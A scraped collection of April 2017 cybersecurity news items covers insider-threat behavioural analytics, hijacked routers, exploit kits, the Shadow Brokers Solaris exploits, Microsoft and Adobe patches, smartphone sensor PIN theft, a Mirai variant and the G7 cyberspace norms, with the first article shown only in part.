"Behavioral analytics is the only way to... get real insight into insider threat," explains Nir Polak, CEO of Exabeam. "UBA tells you when someone is doing something that is unusual and risky, on an individual basis and compared to peers. UBA cuts through the noise to give real insight – any agencies looking to get a handle on insider threat should be looking closely at UBA."
Humphrey Christian, VP of Product Management, at Bay Dynamics, advocates a combination of UBA and risk management. "A threat is not a threat if it's targeting an asset that carries minimal value to the organization. An unusual behavior is also not a threat if it was business justified, such as it was approved by the employee's manager," he told SecurityWeek. "Once an unusual behavior is identified, the application owner who governs the application at risk, must qualify if he indeed gave the employee access to the asset. If the answer is 'no', then that alert should be sent to the top of the investigation pile."
Learn to Detect Insider ThreatsThis week a new paper published by the Intelligence and National Security Alliance (INSA) proposes that physical user behavioral analytics should go a step further and incorporate psycho-analytics set against accepted behavior models. These are not just the baseline of acceptable behavior on the network, but incorporate the psychological effect of life events both inside and outside of the workplace. The intent is not merely to respond to anomalous behavior that has already happened, but to get ahead of the curve and be able to predict malicious behavior before it happens.
The INSA paper starts from the observation that employees don't just wake up one morning and decide to be malicious. Malicious behavior is invariably the culmination of progressive dissatisfaction. That dissatisfaction can be with events both within and outside the workplace. INSA's thesis is that clues to this progressive dissatisfaction could and should be detected by technology; machine learning (ML) and artificial intelligence (AI).
This early detection would allow managers to intervene and perhaps help a struggling employee and prevent a serious security event.
Early signs of unhappiness within the workplace can be relatively easy to detect when they manifest as 'counterproductive work behaviors' (CWBs). INSA suggests that there are three key insights "that are key to detecting and mitigating employees at risk for committing damaging insider acts." CWBs do not occur in isolation; they usually escalate; and they are seldom spontaneous.
Successful insider threat mitigation can occur when early non-harmful CWBs can be detected before they escalate.
Using existing studies, such as the Diagnostic and Statistical Manual of Mental Disorders Vol. 5 (DSM-5), INSA provides a table of stressors and potentially linked CWBs. For example, emotional stress at the minor level could lead to repeated tardiness; at a more serious level it could lead to bullying co-workers and unsafe (dangerous) behavior. INSA's argument is that while individual CWBs might be missed by managers and HR, patterns -- and any escalation of stress indicators -- could be detected by ML algorithms. This type of user behavior analytics goes beyond anomalous network activity and seeks to recognize stressed user behavior that could lead to anomalous network activity before it happens.
But it still suffers from one weakness -- that is, where the stressors that affect the user's work occur entirely outside of the workplace; such as divorce, financial losses, or family illness. Here INSA proposes a more radical approach, but one that would work both inside and outside the workplace.
"In particular," it suggests, "sophisticated psycholinguistic tools and text analytics can monitor an employee's communications to identify life stressors and emotions and help detect potential issues early in the transformation process."
The idea is to monitor and analyze users' communications, which could include tweets and blogs. The analytics would look for both positive and negative words. An example is given. "I love food ... with ... together we ... in ... very ... happy." This sequence could easily appear in a single tweet; but the use of 'with', 'together', and 'in' would suggest an inclusive and agreeable temperament.
In fairness to doubters, INSA has done itself no favors with the misuse of a second example. Here Chelsea (formerly Bradley) Manning is quoted. "A second blog post," says INSA, "substantiates that Life Event and identifies an additional one, 'Relationship End/Divorce' with two mentions for each Life Event." The implication is that psycholinguistic analysis of this post would have highlighted the stressors in Manning's life and warned employers of the potential for malicious activity. The problem, however, is that the quoted section comes not from a Manning blog post before the event, but from the chat logs of his conversation with Lamo in May 2010 (see Wired) after WikiLeaks had started publishing the documents. The linguistic analysis in this case might have helped explain Manning's actions, but could do nothing to forewarn the authorities.
The point, however, is that psycholinguistic analysis has the potential to highlight emotional status, and over time, highlight individuals on an escalating likelihood of developing first minor CWBs and ultimately major CWBs. The difficulty is that it really is kind of creepy. That creepiness is acknowledged by INSA. "Use of these tools entails extreme care to assure individuals' civil or privacy rights are not violated," it says. "Only authorized information should be gathered in accordance with predefined policies and legal oversight and only used for clearly defined objectives. At no point should random queries or 'What If' scenarios be employed to examine specific individuals without predicate and then seek to identify anomalous bad behavior."
Users' decreasing expectation of privacy would suggest that sooner or later psycholinguistic analysis for the purpose of identifying potential malicious insiders before they actually become malicious insiders will become acceptable. In the meantime, however, it should be used with extreme caution and with the clear, unambiguous informed consent of users. What INSA is advocating, however, is an example of what law enforcement agencies have been seeking for many years: the ability to predict rather than just respond to bad behavior.
Thousands of Hacked Routers Used for WordPress Attacks
12.4.2017 securityweek Attack
Tens of thousands of vulnerable home routers have been hacked and abused to launch attacks on WordPress websites, security firm Wordfence reported on Tuesday.
Last month, the company noticed that the number of attacks launched against customer websites from Algeria had increased significantly compared to the previous period. A closer analysis of the more than 10,000 attacking IP addresses revealed that most were associated with state-owned telecoms company Telecom Algeria.
Wordfence has determined that hackers exploited vulnerabilities in the routers provided by Telecom Algeria to customers, and then abused the hijacked devices to launch brute-force and other types of attacks on WordPress sites.
Researchers identified compromised routers from 27 other ISPs worldwide, including ones in Pakistan, India, the Philippines, Turkey, Egypt, Morocco, Malaysia, Brazil, Indonesia, Serbia, Saudi Arabia, Russia, Romania, Sri Lanka, Croatia and Italy.
The routers of more than a dozen of these ISPs are listening on port 7547, which is used by companies to manage their customers’ devices, and are running a vulnerable version of the AllegroSoft RomPager web server.
Versions prior to 4.34 of RomPager are affected by a critical vulnerability – tracked as CVE-2014-9222 and dubbed “Misfortune Cookie” – that can be exploited to hijack devices made by Huawei, Edimax, D-Link, TP-Link, ZTE, ZyXEL and other vendors. When they first disclosed the flaw back in December 2014, researchers warned that there had been at least 12 million vulnerable routers across most of the world’s countries.
According to Wordfence, 14 of the 28 ISPs provide routers vulnerable to Misfortune Cookie attacks. Researchers also pointed to another vulnerability, disclosed last year, that can be exploited to hijack home routers that use port 7547.
The company reported that, over the course of three days, 6.7 percent of all attacks aimed at protected WordPress websites came from home routers that have port 7547 open.
In the past month, Wordfence has seen more than 90,000 unique IP addresses from the 28 ISPs that appear to be associated with compromised routers. Experts said most IP addresses generate less than 1,000 attacks over the course of up to 48 hours, after which they stop.
WordFence has made available a simple online tool that can be used to check if a router has port 7547 open.
Terror Exploit Kit Rising as Sundown Disappears
12.4.2017 securityweek Exploit
One year after the exploit kit (EK) landscape was shaken by the sudden disappearance of the Angler and Nuclear kits, another change is happening in the segment. While the Sundown EK has been inactive for the past month or so, the recent Terror EK is being used in new campaigns, researchers say.
While not new, Sundown has been a small player in the EK market, and showed increased presence only after Neutrino became silent last September, although it didn’t make it to the top three by the end of the year.
Its operators have been highly active with the integration of new exploits and the adoption of new technologies, including steganography, which allowed them to hide exploits in harmless-looking image files.
Just weeks ago, Cisco Talos published an analysis of Sundown, revealing the latest changes the EK’s operators had adopted, such as a switch to new vulnerabilities to exploit and modifications to the landing page’s code, which started showing similarities to the RIG EK.
Soon after, however, security researchers were noticing the long silence Sundown had been showing for over a month, and started questioning its existence:
Follow
Kafeine @kafeine
Sundown (Beps) and Nebula out ? More than one month since last hits.
11:26 AM - 8 Apr 2017
32 32 Retweets 32 32 likes
Variants of Sundown also seem to have disappeared from the scene, including Bizarro and Greenflash, which could suggest a complete cease of operations, Malwarebytes Labs researchers suggest. However, it remains to be seen if Sundown is just taking a break or has completely vanished.
Simultaneously, another EK is picking up pace, namely Terror. Initially detailed in January and considered to be a Sundown variant due to many code similarities, Terror appears involved in several distribution campaigns, and the security researchers suggest that it could pose a real threat.
Terror EK’s author, which Trustwave identified on various underground forums by the handle @666_KingCobra, is selling the kit under different names, researchers say. Apparently, the threat has been also known under the names of Blaze, Neptune, and Eris.
The best known instance of Terror is engaged in a malvertising campaign distributing Smoke Loader, which Malwarebytes has been monitoring for a while. Leveraging various ad networks that generate low quality traffic, the campaign uses Internet Explorer, Flash, and Silverlight exploits to compromise users’ systems.
A newer campaign, however, uses a different landing page and no longer distributes Smoke Loader, but pushes the Andromeda malware as the final payload. Active only for a few days, the campaign redirects to the EK landing page either via the server 302 redirect call, or via script injection. Only Flash and Internet Explorer exploits are abused in these attacks.
“Sundown EK was notorious for stealing exploits from others and the tradition continues with more copy/paste from the ashes of dead exploit kits. If this harvesting was done on higher grade EKs, we would have a more potent threat but this isn’t the case here,” Malwarebytes concludes.
DARPA Wants Hardware With Built-in Security
12.4.2017 securityweek Safety
DARPA seeking solutions for more secure hardware
The U.S. Defense Advanced Research Projects Agency (DARPA) announced this week a new program that aims to develop a framework for building hack protections directly into hardware.
The agency pointed out that the integrated circuits found in many devices often have vulnerabilities that can be exploited with software exploits, and software patches represent only a temporary solution.
As part of a new 39-month program named System Security Integrated Through Hardware and Firmware (SSITH), DARPA hopes to receive proposals for new chip architectures which would disarm software attacks that leverage hardware flaws.
The SSITH project focuses on two main technical areas: developing a secure hardware architecture and tools to help manufacturers take advantage of security innovations, and identifying a methodology and metrics for determining the security status of new systems.
Some chip makers, such as Intel, have already been integrating various protections into their products, but DARPA wants design tools that would be widely available, leading to built-in security becoming a standard for integrated circuits used in U.S. Department of Defense and commercial systems.
DARPA said proposals should address one or more of the seven hardware vulnerability classes in the Common Weaknesses Enumeration (CWE) list. These include code injections, permissions and privileges, buffer errors, information leakage, resource management, numeric errors, and cryptographic issues.
The agency pointed out that more than 2,800 incidents have involved one of these vulnerabilities, and SSITH program manager Linton Salmon, of DARPA’s Microsystems Technology Office, believes more than 40 percent of software weaknesses can be addressed by removing these types of flaws.
“Security for electronic systems has been left up to software until now, but the overall confidence in this approach is summed up in the sardonic description of this standard practice as ‘patch and pray,’” said Salmon “This race against ever more clever cyberintruders is never going to end if we keep designing our systems around gullible hardware that can be fooled in countless ways by software.”
Experts interested in submitting a proposal can learn more about the project and have the opportunity to team up with others on Friday, April 21, 2017, at the Booz Allen Hamilton Conference Center.
Watch out! Shadow Brokers dump includes remote root exploits for Solaris boxes
12.4.2017 securityaffairs BigBrothers
The security expert Matthew Hickey has discovered two tools dubbed EXTREMEPARR and EBBISLAND which were specifically designed to target Solaris systems.
After the mysterious Shadow Brokers group has leaked the archive containing the stolen NSA hacking tools and exploits, security experts started analyzing the huge trove of data. Experts discovered that NSA operators developed an attack code to compromise Oracle’s Solaris.
The cyber security expert Matthew Hickey, the cofounder of British security shop Hacker House, digging the archive has discovered two tools dubbed EXTREMEPARR and EBBISLAND which were specifically designed to target Solaris systems.
Hacker Fantastic @hackerfantastic
EXTREMEPARR - 0day local privilege escalation attack working on Solaris 7,8,9,10 x86 & SPARC (confirmed & tested, platforms & versions.)
9:31 PM - 10 Apr 2017
87 87 Retweets 97 97 likes
Hacker Fantastic @hackerfantastic
CONFIRMED #0day EBBISLAND (EBBSHAVE) is a root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86. pwn
12:00 AM - 11 Apr 2017
91 91 Retweets 102 102 likes
Both tools could be used by a logged-in user to escalate privileges to root, and obtain root access remotely over the network. The tools work on Solaris systems running versions 6 to 10 on x86 and Sparc, and experts believe it could work also on the latest build, version 11.
The EXTREMEPARR tool elevates the logged-in entity (i.g. a user, a script) to root by abusing dtappgather, file permissions, and the setuid binary at.
The EBBISLAND tool could be used to target any open RPC service to spawn a remote root shell on the flawed Solaris box. The EBBISLAND triggers a buffer overflow vulnerability in Solaris’s XDR code.
Summarizing the NSA could open a root shell on any Solaris system, the experts noticed that the use of the exploits doesn’t request specific skills.
“These are prebuilt static binaries and you can run them out of the box with very little technical knowledge,” Hickey told The Register.
Follow
Hacker Fantastic @hackerfantastic
The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.
12:23 AM - 11 Apr 2017
68 68 Retweets 54 54 likes
Hickey scanned the Internet searching for vulnerable connected devices, he used the popular Shodan.io search engine, and found thousands of vulnerable systems. But the real threat, he said, was that a lot more of these machines are going to be running internally behind firewalls, and the exploit code could be used to root these once an attacker gets a foothold within an organization.
Many of the flawed machines identified by the expert run internally behind firewalls, this means that the above exploit code could be used by attackers to compromise the target network and move laterally.
Microsoft Issues Patches for Actively Exploited Critical Vulnerabilities
11.4.2017 thehackernews Vulnerebility
Besides a previously undisclosed code-execution flaw in Microsoft Word, the tech giant patches two more zero-day vulnerabilities that attackers had been exploiting in the wild for months, as part of this month's Patch Tuesday.
In total, Microsoft patches 45 unique vulnerabilities in its nine products, including three previously undisclosed vulnerabilities under active attack.
The first vulnerability (CVE-2017-0199) under attack is a remote-code execution flaw that could allow an attacker to remotely take over a fully patched and up to date computer when the victim opens a Word document containing a booby-trapped OLE2link object.
The attack can bypass most exploit mitigations developed by Microsoft, and according to Ryan Hanson of security firm Optiv, in some cases, exploits can execute malicious code even when Protected View is enabled.
As The Hacker News reported Monday, this code-execution flaw in Microsoft Word was being exploited by hackers to spread a version of infamous Dridex banking trojan.
Also, according to blog posts published Tuesday by security firms FireEye and Netskope, hackers are exploiting the same Word vulnerability to install Latentbot and Godzilla malware respectively.
Microsoft has released a fix for CVE-2017-0199 and credited Hanson with responsible reporting the critical vulnerability to the company.
Patch for Critical IE Flaw Being Exploited in the Wild
The company also pushed out a patch for another critical vulnerability (CVE-2017-0210) under active attack. The flaw is an elevation of privilege vulnerability in Internet Explorer that would allow an attacker to trick a victim into visiting a compromised website.
The vulnerability could allow the attacker to access sensitive information from one domain and inject it into another domain.
"The vulnerability by itself does not allow arbitrary code to be run. However, the vulnerability could be used in conjunction with another vulnerability (for example, a remote code execution vulnerability) that could take advantage of the elevated privileges when running arbitrary code," Microsoft's guidance for the flaw reads.
This IE vulnerability is also being exploited in the wild.
Another Critical Word Vulnerability Yet Unpatched!
The third previously undisclosed flaw (CVE-2017-2605) resides in the Encapsulated PostScript (EPS) filter in Microsoft Office, but Microsoft did not actually release an update for this flaw in Tuesday's update batch.
However, the tech giant issued an update for Microsoft Office that, by default, disable the EPS filter in MS Office as a defense measure. This Word vulnerability is also being exploited in the wild when a target opens a malicious EPS image in Word.
"Microsoft is aware of limited, targeted attacks that could leverage an unpatched vulnerability in the EPS filter and is taking this action to help reduce customer risk until the security update is released," the guidance for the flaw reads.
The company also issued a patch for Windows 10 Creators Update, which was made available on Tuesday, addressing some remote code execution flaws and elevation of privilege bugs.
In total, Microsoft rolled out 15 security updates on Tuesday patching dozens of unique CVEs in its products, including the Windows OS, Exchange Server, Edge and Internet Explorer, Office, Office Services and Office Web Apps, Visual Studio for Mac Silverlight and Adobe Flash.
Users are strongly advised to install updates as soon as possible in order to protect themselves against the active attacks in the wild on three separate Microsoft products.
Hackers Can Steal Your Passwords Just by Monitoring SmartPhone Sensors
11.4.2017 thehackernews Mobil
Do you know how many kinds of sensors your smartphone has inbuilt? And what data they gather about your physical and digital activities?
An average smartphone these days is packed with a wide array of sensors such as GPS, Camera, microphone, accelerometer, magnetometer, proximity, gyroscope, pedometer, and NFC, to name a few.
Now, according to a team of scientists from Newcastle University in the UK, hackers can potentially guess PINs and passwords – that you enter either on a bank website, app, your lock screen – to a surprising degree of accuracy by monitoring your phone's sensors, like the angle and motion of your phone while you are typing.
The danger comes due to the way malicious websites and apps access most of a smartphone's internal sensors without requesting any permission to access them – doesn't matter even if you are accessing a secure website over HTTPS to enter your password.
Your Phone doesn't Restrict Apps from Accessing Sensors' Data
Your smartphone apps usually ask your permissions to grant them access to sensors like GPS, camera, and microphone.
But due to the boom in mobile gaming and health and fitness apps over the last few years, the mobile operating systems do not restrict installed apps from accessing data from the plethora of motion sensors like accelerometer, gyroscope, NFC, motion and proximity.
Any malicious app can then use these data for nefarious purposes. The same is also true for malformed websites.
"Most smartphones, tablets and other wearables are now equipped with a multitude of sensors, from the well-known GPS, camera, and microphone to instruments such as the gyroscope, proximity, NFC, and rotation sensors and accelerometer," Dr. Maryam Mehrnezhad, the paper's lead researcher, said describing the research.
"But because mobile apps and websites don't need to ask permission to access most of them, malicious programs can covertly 'listen in' on your sensor data and use it to discover a wide range of sensitive information about you such as phone call timing, physical activities and even your touch actions, PINs and passwords."
Video Demonstration of the Attack
Scientists have even demonstrated an attack that can record data from around 25 sensors in a smartphone. They have also provided a video demonstration of their attack, showing how their malicious script is collecting sensor data from an iOS device.
The team wrote a malicious Javascript file with the ability to access these sensors and log their usage data. This malicious script can be embedded in a mobile app or loaded on a website without your knowledge.
Now all an attacker need is to trick victims into either installing the malicious app or visiting the rogue website.
Once this is done, whatever the victim types on his/her device while the malicious app or website running in the background of his phone, the malicious script will continue to access data from various sensors and record information needed to guess the PIN or passwords and then send it to an attacker's server.
Guessing PINs and Passwords with a High Degree of Accuracy
Researchers were able to guess four-digit PINs on the first try with 74% accuracy and on the fifth try with 100% accuracy based on the data logged from 50 devices by using data collected from just motion and orientation sensors, which do not require any special permission to access.
The scientists were even able to use the collected data to determine where users were tapping and scrolling, what they were typing on a mobile web page and what part of the page they were clicking on.
Researchers said their research was nothing but to raise awareness to those several sensors in a smartphone which apps can access without any permission, and for which vendors have not yet included any restrictions in their standard built-in permissions model.
"Despite the very real risks, when we asked people which sensors they were most concerned about we found a direct correlation between perceived risk and understanding," Mehrnezhad said. "So people were far more concerned about the camera and GPS than they were about the silent sensors."
Mehrnezhad says the team had alerted leading browser providers such as Google and Apple of the risks, and while some, including Mozilla and Safari, have partially fixed the issue, the team is still working with the industry to find an ideal solution.
More technical details can be found in the full research paper, titled "Stealing PINs via mobile sensors: actual risk versus user perception," published Tuesday in the International Journal of Information Security.
Adobe Patches Flash, Reader Flaws Exploited at Pwn2Own
12.4.2017 securityweek Vulnerebility
Adobe released security updates for several of its products on Tuesday to address a total of 59 vulnerabilities, including flaws disclosed last month at the Pwn2Own 2017 hacking competition.
A majority of the security holes, 47 to be precise, have been patched in the Windows and Mac versions of Adobe Acrobat and Reader. The vulnerabilities, rated critical with a priority rating of 2 (i.e. no exploits and exploitation not imminent), have been described as memory corruptions that could lead to arbitrary code execution or memory address leaks.
Seven critical vulnerabilities have been patched in Adobe Flash Player. The security holes are use-after-free and memory corruption issues that could lead to code execution.
Many of the flaws patched on Tuesday were reported to Adobe via Trend Micro’s Zero Day Initiative (ZDI), including several Reader and Flash Player vulnerabilities disclosed at ZDI’s Pwn2Own competition.
ZDI has published five advisories detailing the Pwn2Own security holes tracked as CVE-2017-3062, CVE-2017-3063, CVE-2017-3055, CVE-2017-3056 and CVE-2017-3057.
Adobe has also resolved vulnerabilities in Photoshop CC for Mac and Windows, Campaign, and the Creative Cloud Desktop Application for Windows. The company has found no evidence of exploitation in the wild.
Microsoft has also released patches for tens of vulnerabilities this Tuesday, including for zero-day flaws exploited in the wild.
One of the zero-days is CVE-2017-0199, an Office and WordPad vulnerability that has been exploited to deliver malware such as Dridex, WingBird, Latentbot and Godzilla. Another zero-day is CVE-2017-0210, a privilege escalation vulnerability affecting Internet Explorer.
The third zero-day impacts Office and it hasn’t actually been patched, but Microsoft did release a mitigation that should help reduce the risk of exploitation. This flaw has been exploited in limited, targeted attacks.
Microsoft Patches Office, IE Flaws Exploited in Attacks
12.4.2017 securityweek Vulnerebility
Microsoft’s security updates for April 2017 address more than 40 critical, important and moderate severity vulnerabilities, including three zero-day flaws that have been exploited in attacks.
According to Microsoft, the updates resolve flaws affecting Edge, Internet Explorer, Windows, Office, Visual Studio for Mac, .NET Framework, Silverlight and Adobe Flash Player components.
One of the zero-days patched by Microsoft this month is CVE-2017-0199, an Office and WordPad vulnerability that can be exploited for remote code execution. The security hole has been exploited in the wild by malicious actors to deliver various pieces of malware, including Dridex, WingBird, Latentbot and Godzilla.
Another vulnerability that has been actively exploited is CVE-2017-0210, a privilege escalation weakness affecting Internet Explorer. Microsoft said the flaw exists due to the lack of proper enforcement of cross-domain policies, and it can be exploited by tricking the targeted user into accessing a specially crafted web page. However, the company has not shared any information about the attacks it has been exploited in.
The third zero-day, an Office flaw which Microsoft says has been exploited in limited targeted attacks, has not been patched with this month’s updates. However, the company has released a mitigation that should help reduce the risk of exploitation until a patch is made available.
The issue, tracked by Microsoft with the identifier 2017-2605 (no CVE), is related to the Encapsulated PostScript (EPS) Filter in Office. The company’s mitigation turns off the EPS filter by default.
The list of critical flaws addressed on Tuesday also includes 13 bugs affecting Internet Explorer, Edge, .NET, Office and Hyper-V.
Microsoft has been transitioning from security bulletins to a database called Security Update Guide. The transition has now been completed – no security bulletins have been published this month – and while some users welcome the change, others said they liked the old format better.
“[The] Security Update Guide provides a number of nice filtering options, but you lose a bit of the organization,” said Chris Goettl, product manager with Ivanti. “For instance, to look at all CVEs that are resolved for a single update, you must now look at each individually where the bulletin page had them organized into one place. Likely, it will take a while for people to get used to.”
It’s also worth noting that this is the last round of security updates for Windows Vista, which has reached end of support.
Adobe patches tens of flaws across several products
Security updates released on Tuesday by Adobe patch nearly 60 vulnerabilities across several of the company’s products. The Acrobat and Reader updates address 47 flaws, including many that could lead to arbitrary code execution.
The rest of the security holes impact Flash Player, Photoshop CC for Mac and Windows, Campaign, and the Creative Cloud Desktop Application for Windows. Adobe has found no evidence of exploitation in the wild.
Microsoft Patch Tuesday fixes three flaws actively exploited in attacks in the wild
12.4.2017 securityaffairs Vulnerebility
Today Microsoft Patch Tuesday fixed the zero-day Word vulnerability that has been actively exploited in attacks in the wild.
Microsoft today patched the zero-day Word vulnerability that has been exploited in attacks in the wild. Just yesterday I wrote about a phishing campaign leveraging the flaw to deliver the Dridex banking Trojan.
Microsoft published security patches that addressed a total of 45 CVEs in nine products, including Internet Explorer, Microsoft Edge and Windows 10. Most of the updates address problems in Microsoft IE and Edge browsers.
The company confirmed that three of the vulnerabilities among this Tuesday updates are under active attack in the wild.
The first vulnerability actively exploited by attackers is tracked as CVE-2017-0199, it allowed attackers to use a specially-crafted document embedding an OLE2link object to spread malware such as the Dridex banking Trojan.
“While labelled as an Outlook issue, this is actually bug actually stems from an issue within RTF files. According to published reports, the exploit uses an embedded OLE2link object in a specially-crafted document. It should also be noted that these attacks can be thwarted by enabling Office’s Protective View feature. There are updates for both Office and Windows to be applied, and both should be considered necessary for complete protection.” reads the Patch Tuesday analysis by the Zero Day Initiative.
The second flaw exploited in the wild is an Internet Explorer elevation of privilege vulnerability tracked as CVE-2017-0210. The flaw could be exploited by attackers to access information from one domain and inject it into another domain.
“The exploit allows an attacker to access sensitive information from one domain and inject it into another domain, which could allow the attacker to gain elevated privileges. However, direct code execution is not possible through this bug alone. Instead, it would likely be used with a bug that executes code at a low integrity level to elevate the code execution to medium level integrity.” continues ZDI.
Microsoft published an the 2017-2605*: “Defense-in-Depth Update for Microsoft Office”, to address a flaw tracked as CVE-2017-2605. It is a Microsoft Office bug in the Encapsulated PostScript (EPS) filter in Office.
“According to Microsoft, they are aware of “limited targeted attacks” that take advantage of an unpatched vulnerability in the EPS filter. This temporary measure is being pushed out until a true fix is released. Issues like this used to be covered by Security Advisories, so perhaps this indicates Microsoft has chosen to do away with these as well.” states the analysis.
Microsoft did not issue an update to address this flaw, it opted to update Microsoft Office turning off, by default, the EPS filter in Office as a defense-in-depth measure.
Patch Tuesday
Microsoft also issued a fix for Windows 10 (Creators Update) that addresses several remote code execution and elevation of privilege flaws.
Giving a look at the list of the vulnerabilities fixed by this last Microsoft Patch Tuesday we can find:
CVE-2017-0201 IE RCE vulnerability ;
CVE-2017-0093 Edge scripting engine memory corruption vulnerability;
CVE-2017-0162, CVE-2017-0163, CVE-2017-0180 Hyper-V vulnerabilities;
The Mirai botnet is back and includes a Bitcoin Mining component
12.4.2017 securityaffairs BotNet
Experts at IBM X-Force security firm warn of a new Mirai Botnet implementing Bitcoin crypto-currency mining capabilities.
The Mirai botnet was first spotted in august 2016 by the security researcher MalwareMustDie, it was specifically designed to compromise vulnerable or poorly protected IoT. Once Mirai malware compromises an IoT device it recruits it into a botnet primarily used for launching DDoS attacks, such as the one that hit Dyn DNS service.
In October 2016, the Mirai source code was leaked and threat actors in the wild started customizing their Mirai botnet.
The last variant of the Mirai botnet spotted in the wild by IBM researchers implements further capabilities, it includes a component for Bitcoin mining.
It is not surprising, crooks always try to catch every opportunity and the value of the crypto-currency has doubled in price in the last months reaching more than $1,290 per unit a few weeks ago.
“This new variant of ELF Linux/Mirai malware with the bitcoin mining component has us pondering, though.” reads the analysis published by IBM X-Force security researchers. “Attackers certainly have much to gain from having bitcoins in their pocket to facilitate their cybercriminal activities — bitcoin is the currency of choice for purchasing illegal commodities such as malware.”
The new Bitcoin mining-capable Mirai botnet was involved in a short-lived, high-volume campaign at the end of March.
The malware targeted Linux machines running BusyBox, most of them are DVR servers with default Telnet credentials.
The new Mirai variant targets this specific category of IoT devices because it uses their computing power to mine Bitcoin.
“The new ELF Linux/Mirai malware variant we discovered included another add-on: a bitcoin miner slave. This led us to question the effectiveness of a bitcoin miner running on a simple IoT device that lacks the power to create many bitcoins, if any at all. Given Mirai’s power to infect thousands of machines at a time, however, there is a possibility that the bitcoin miners could work together in tandem as one large miner consortium.” continues IBM. “We haven’t yet determined that capability, but we found it to be an interesting yet concerning possibility. It’s possible that while the Mirai bots are idle and awaiting further instructions, they could be leveraged to go into mining mode.”
The experts at IBM found the Mirai dropper in a web console and detected the site it was associated in a series of high-volume command injection attacks.
The website was used by operators as a malware package archive repository, experts discovered that the file package also included a Dofloo backdoor and a Linux shell.
Malware pro Microsoft Word se šířil e-mailovou přílohou
12.4.2017 SecurityWorld Viry
Útočníci během posledních několika měsíců aktivně zneužívali zero day zranitelnost v oblíbené kancelářské aplikaci Microsoft Word. Pomocí zranitelnosti šířili malware. Dle informací serveru BBC v úterý 11. dubna Microsoft chybu opravil ve standardní měsíční bezpečností aktualizaci.
Mluvčí Microsoftu doporučil Word aktualizovat bezprostředně po vydání záplaty; není jisté, zda se chyba dotkla i verze Wordu pro Apple Mac.
První zpráva o útocích se objevila teprve nedávno od bezpečnostní firmy McAfee, kteří analyzovali několik podezřelých souborů Wordu. Vyšlo najevo, že soubory zneužívají zranitelnost vyskytující se „ve všech verzích Microsoft Office včetně nejnovějších Office 2016 na Windows 10“.
Chyba souvisí s technologií Windows OLE (object linking and embedding), která umožňuje vkládání a následnou úpravu objektů a odkazů v dokumentu, píší výzkumníci z McAfee v příspěvku na blogu.
Když jsou dokumenty útočníků otevřeny uživatelem, připojí se k externímu serveru a stáhnou soubor HTA (HTML Application), která obsahuje VBScript kód – samozřejmě infikovaný malwarem. HTA soubor se tváří jako RTF a je automaticky spuštěn.
„Úspěšný útok zavře nakažený dokument Wordu a vyskočí falešný, který se uživateli objeví,“ popisují výzkumníci McAfee. „V pozadí již tiše běží malware, nainstalovaný v systému oběti.“
Prohledáním bezpečnostních dat z minula firma McAfee zjistila, že útoky probíhají minimálně od konce ledna.
Po zprávě McAfee potvrdili analytici z jiné bezpečnostní společnosti, FireEye, že si jsou rovněž vědomi těchto útoků, a to již několik týdnů. Vše oznamovali Microsoftu a spolupracovali s ním na řešení.
Dle FireEye jsou nakažené dokumenty Wordu zaslány jako e-mailová příloha. Firma neposkytla žádné ukázky nakažených e-mailů, vzhledem k zero day stavu zranitelnosti však zřejmě mířily pouze na omezené množství uživatelů.
Jak McAfee, tak FireEye si povšimly, že zranitelností lze prolomit většinu na paměti založené ochrany, která je ve Windows zahrnuta. Zranitelnost je totiž spíše chybou v logice než v programování.
G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE
12.4.2017 securityaffairs BigBrothers
Presented the voluntary, non-binding norms of State behavior during peacetime in the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE.
The risk of escalation and retaliation in cyberspace, the increasing number of cyber attacks and cyber threats even more sophisticated could have a destabilizing effect on international peace and security. The risk of conflict between states caused so cyber incidents encourages all States to engage in law-abiding, norm-respecting and confidence-building behavior in their use of ICT.
G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE
I’m very proud to share with you the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE, I had the honor to be a member of the group that worked on the proposal for voluntary, non-binding norms of State behavior during peacetime. We presented 12 points aimed to propose stability and security in the cyberspace. The declaration invites all the States to collaborate with the intent to reduce risks to international peace, security, and stability.
Below the point presented in the Declaration:
Consistent with the purposes of the United Nations, including to maintain international peace and security, States should cooperate in developing and applying measures to increase stability and security in the use of ICTs and to prevent ICT practices that are acknowledged to be harmful or that may pose threats to international peace and security;
In case of ICT incidents, States should consider all relevant information, including the larger context of the event, the challenges of attribution in the ICT environment and the nature and extent of the consequences;
States should not knowingly allow their territory to be used for internationally wrongful acts using ICTs;
States should consider how best to cooperate to exchange information, assist each other, prosecute terrorist, and criminal use of ICTs and implement other cooperative measures to address such threats. States may need to consider whether new measures need to be developed in this respect;
States, in ensuring the secure use of ICTs, should respect Human Rights Council resolutions 20/8 and 26/13 on the promotion, protection and enjoyment of human rights on the Internet, as well as General Assembly resolutions 68/167 and 69/166 on the right to privacy in the digital age, to guarantee full respect for human rights, including the right to freedom of expression;
A State should not conduct or knowingly support ICT activity contrary to its obligations under international law that intentionally damages critical infrastructure or otherwise impairs the use and operation of critical infrastructure to provide services to the public;
States should take appropriate measures to protect their critical infrastructure from ICT threats, taking into account General Assembly resolution 58/199 on the creation of a global culture of cybersecurity and the protection of critical information infrastructures, and other relevant resolutions;
States should respond to appropriate requests for assistance by another State whose critical infrastructure is subject to malicious ICT acts. States should also respond to appropriate requests to mitigate malicious ICT activity aimed at the critical infrastructure of another State emanating from their territory, taking into account due regard for sovereignty;
States should take reasonable steps to ensure the integrity of the supply chain so that end users can have confidence in the security of ICT products. States should seek to prevent the proliferation of malicious ICT tools and techniques and the use of harmful hidden functions;
States should encourage responsible reporting of ICT vulnerabilities and share associated information on available remedies to such vulnerabilities to limit and possibly eliminate potential threats to ICTs and ICT-dependent infrastructure;
States should not conduct or knowingly support activity to harm the information systems of the authorized emergency response teams (sometimes known as computer emergency response teams or cybersecurity incident response teams) of another State. A State should 5 not use authorized emergency response teams to engage in malicious international activity.
No country should conduct or support ICT-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.
Let me thank the colleagues Luigi Martino and Marco Lapadura that worked with me at the declaration, and of course to Minister Gianfranco Incarnato that led the group of work.
Canada Court Denies Accused Yahoo Hacker Bail
12.4.2017 securityweek Crime
